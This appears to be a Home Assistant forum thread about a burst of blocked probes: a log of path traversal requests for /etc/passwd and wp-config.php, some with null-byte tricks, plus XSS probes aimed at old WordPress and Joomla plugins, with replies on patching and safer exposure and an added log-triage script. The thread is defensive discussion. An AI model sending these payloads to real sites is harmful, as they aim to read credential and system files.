Path traversal hack attempt

I noticed that my internet-facing Home Assistant was targeted yesterday evening by someone attempting a path traversal attack.

2023-01-16 19:40:54.408 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php
2023-01-16 19:40:55.752 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd
2023-01-16 19:40:57.125 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
2023-01-16 19:40:57.261 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?sl=../../../../../../../etc/passwd%0
2023-01-16 19:40:58.153 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /src/redirect.php?plugins[]=../../../../etc/passwd%00
2023-01-16 19:40:58.537 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_imagebrowser&folder=../../../../etc/passwd
2023-01-16 19:42:13.056 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd
2023-01-16 19:42:13.111 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00
2023-01-16 19:42:13.687 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1
2023-01-16 19:42:13.756 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
2023-01-16 19:42:14.794 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
2023-01-16 19:42:40.672 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /comm.php?id=../../../../../../../../../../etc/passwd
2023-01-16 19:42:44.391 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd
2023-01-16 19:44:09.777 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd
2023-01-16 19:44:11.331 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_projectfork&section=../../../../../../../../etc/passwd
2023-01-16 19:44:11.665 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00
2023-01-16 19:44:11.679 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd
2023-01-16 19:44:14.984 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd
2023-01-16 19:44:16.401 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1
2023-01-16 19:45:36.162 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd
2023-01-16 19:45:37.323 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd
2023-01-16 19:45:39.238 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd
... hundreds more lines of this type...

Has anyone else noticed that?

Does anyone know how to report this to the developers so that they can double-check that no vulnerability is present?

It looks like it is not specifically targeting Home Assistant though; it is more general.
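One way to triage a log like the one posted above, as an added example that is not part of the thread or of Home Assistant's code: it parses the security_filter warnings, URL-decodes each query string and tags what it contains. The function names and tag labels are assumptions made for this example, and the `.php` check assumes Home Assistant exposes no PHP endpoints.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Four lines copied from the log in the post, plus one constructed unrelated line.
SAMPLE_LOG = """\
2023-01-16 19:40:54.408 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php
2023-01-16 19:40:57.125 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
2023-01-16 19:40:58.153 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /src/redirect.php?plugins[]=../../../../etc/passwd%00
2023-01-16 19:42:13.056 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd
2023-01-16 19:43:00.000 INFO (MainThread) [example.component] constructed line that is not a filter warning
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) WARNING \(\w+\) "
    r"\[homeassistant\.components\.http\.security_filter\] "
    r"Filtered a request with a potential harmful query string: (?P<url>\S+)$"
)

def classify(url):
    """Tag one filtered URL by what its decoded query string contains."""
    path, _, query = url.partition("?")
    decoded = unquote(query).lower()  # ..%2F and %3Cscript%3E only show after decoding
    tags = set()
    if "../" in decoded:
        tags.add("path_traversal")
    if "<script" in decoded:
        tags.add("xss_probe")
    if "\x00" in decoded:
        tags.add("null_byte")
    if path.lower().endswith(".php"):
        tags.add("php_target")  # assumption: no PHP in Home Assistant, so generic scan
    return tags

def summarize(log_text):
    """Count filter warnings per tag and report the time window they span."""
    tags, stamps = Counter(), []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a security_filter warning
        stamps.append(m["ts"])
        tags.update(classify(m["url"]))
    return {"total": len(stamps), "tags": dict(tags),
            "first": stamps[0] if stamps else None,
            "last": stamps[-1] if stamps else None}

if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```

When every filtered request carries the `php_target` tag and none names a Home Assistant path, the burst is consistent with an untargeted scanner working through a list of PHP application probes.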

This is a known attack vector and will no longer work against Home Assistant. There was a security patch many many versions ago.

It is already saying that it is filtered out…

I know, but I was wondering about what would be displayed in case of a successful attack…

Thanks Tom

Nothing. It would just serve the resource, in this case /etc/passwd. Thankfully this potential vulnerability (even if they specifically targeted HA, which they did not) was patched. Hence the filtered logs. This doesn’t mean there couldn’t be other yet undiscovered vulnerabilities. As far as I know, HA has never been professionally pentested.

I’d be concerned in general having my instance facing the public internet in that way. Your IP was attacked (randomly or not), there’s no guarantee they won’t try again. Possibly using a more targeted vector against HA, depending on how much they know about your system. I would absolutely switch to something more secure, like Cloudflare Zero Trust or a VPN.


There are people testing it though. Home-assistant : Security vulnerabilities, CVEs (follow the references).